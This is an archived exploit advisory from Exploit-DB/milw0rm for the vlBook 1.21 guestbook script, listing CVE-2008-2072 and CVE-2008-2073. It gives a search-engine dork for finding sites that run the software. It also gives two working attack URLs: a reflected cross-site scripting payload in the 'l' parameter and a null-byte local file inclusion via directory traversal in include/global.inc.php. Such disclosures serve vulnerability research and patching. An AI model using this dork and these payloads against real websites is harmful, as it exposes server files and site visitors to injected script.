vlbook 1.21 xss/lfi Multiple Vulnerabilities

2008-05-01T00:00:00
ID EDB-ID:5529
Type exploitdb
Reporter Khashayar Fereidani
Modified 2008-05-01T00:00:00

Description

vlBook 1.21 (XSS/LFI) Multiple Remote Vulnerabilities. CVE-2008-2072,CVE-2008-2073. Webapps exploit for php platform

                                        
                                            #####################################################################################
####                    vlBook 1.21 (ALL VERSION)                                ####
####             Multiple Remote Vulnerabilities (LFI/XSS)                       ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash Or Khashayar Fereidani)                                 #
#Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani)                          #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr
#####################################################################################
#                                                                                   #
#Script Download : http://home.vlab.info/vlbook_1.21.zip                            #
#                                                                                   #
#DORK : "Powered by  vlBook 1.21"                                                   #
#                                                                                   #
#####################################################################################
#                                   < XSS >                                         #
#XSS Address : http://example/?l=" <script>alert('xss')</script>                    #
#                                                                                   #
#####################################################################################
#                                   < LFI >                                         #
#LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00      #
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
################################ TNX GOD ############################################

# milw0rm.com [2008-05-01]